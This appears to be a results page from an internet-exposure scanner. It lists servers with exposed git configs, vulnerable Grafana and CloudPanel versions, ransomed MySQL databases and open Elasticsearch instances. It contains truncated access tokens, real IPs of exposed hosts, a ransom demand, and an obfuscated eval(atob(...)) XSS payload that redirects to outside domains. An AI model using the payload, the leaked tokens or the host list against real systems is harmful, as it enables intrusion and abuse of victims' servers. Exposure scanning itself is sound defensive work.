%2Bplugin%3ARedisOpenPlugin %2Basn%3A%22201094%22 -ip:"52.20.0.0/14" +country:"The Netherlands" +events.leak.severity:"critical"
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://gitlab+deploy-token-...
Found by GitConfigHttpPlugin
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://gitlab+deploy-token-...
Found by GitConfigHttpPlugin
Found vulnerable CloudPanel:
Affected by CVE-2023-35885
Affected by CVE-2023-36630
Affected by CVE-2023-33747
Found by CloudPanelPlugin
[init]
defaultBranch = none
[fetch]
recurseSubmodules = false
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupda...
Found by GitConfigHttpPlugin
[init]
defaultBranch = none
[fetch]
recurseSubmodules = false
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupda...
Found by GitConfigHttpPlugin
[init]
defaultBranch = none
[fetch]
recurseSubmodules = false
[transfer]
bundleURI = true
[core]
repositoryformatversion = 0
filemode = true...
Found by GitConfigHttpPlugin
Found vulnerable Grafana version 7.3.10:
Affected by CVE-2021-39226
Found by GrafanaOpenPlugin
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://python_fire:glpat-sx...
Found by GitConfigHttpPlugin
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://x-token-auth:ATCTT3x...
Found by GitConfigHttpPlugin
Found vulnerable Grafana version 9.2.2:
Affected by CVE-2023-22462
Affected by CVE-2022-39328
Found by GrafanaOpenPlugin
Found vulnerable Grafana version 7.3.3:
Affected by CVE-2021-39226
Found by GrafanaOpenPlugin
Databases: 50, row count: 50272, size: 6.1 MB
Found table RECOVER_YOUR_DATA.RECOVER_YOUR_DATA with 2 records
Found table mysql.audit_log_rules wi...
Ransom notes :
All your data is backed up. You must pay 0.0118 BTC to 1GbLiucJ7fhsM3sYrPKHvZ5mUW2p4AYW7p In 48 hours, your data will be publicly disclosed and deleted. (more information: go to http://iplis.ru/data02)
Found by MysqlOpenPlugin
Databases: 38, row count: 142529, size: 7.9 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :
'"></title></a></style></script><body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp"))><body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp"))><body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LnRvcHJldmVudWVnYXRlLmNvbS9jbmN0d2pkbj9rZXk9NzU0YTVmZGE2Mjk1N2M4MDc1NzdiOTEyYmFiOThlYzYiKQ=="))>
Found by MysqlOpenPlugin
Indices: 4, document count: 38413, size: 757.6 MB
Through Kibana endpoint
Found index read_me with 1 documents (5.3 kB)
Found index .ds-filebeat-...
Analysis helper :
estk --url=http://20.86.6.222:5601 list
Found by ElasticSearchOpenPlugin
Found vulnerable ConnectWise ScreenConnect:
Affected by CW-2024-02-20
Found by ConnectWiseScreenConnect
Indices: 5, document count: 2871, size: 1.9 MB
Through Kibana endpoint
Found index logstash-bouncer with 15 documents (119.7 kB)
Found index .kib...
Analysis helper :
estk --url=http://20.23.241.205:5601 list
Found by ElasticSearchOpenPlugin
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://x-token-auth:ATCTT3x...
Found by GitConfigHttpPlugin
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://sajedvzaman:ghp_PKDq...
Found by GitConfigHttpPlugin
kB)
Found index logstash-2021.05.25 with 1020 documents (818.9 kB)
Found index auth-2021.06.16 with 22
Analysis helper :
estk --url=http://20.50.42.4:5601 list
Found by ElasticSearchOpenPlugin
[fetch]
recurseSubmodules = false
[http "https://az-gitlab.igbimo.com"]
sslCAInfo = /home/gitlab-runner/builds/FZayx8sE/0/konga-blog/blog.tmp/C...
Found by GitConfigHttpPlugin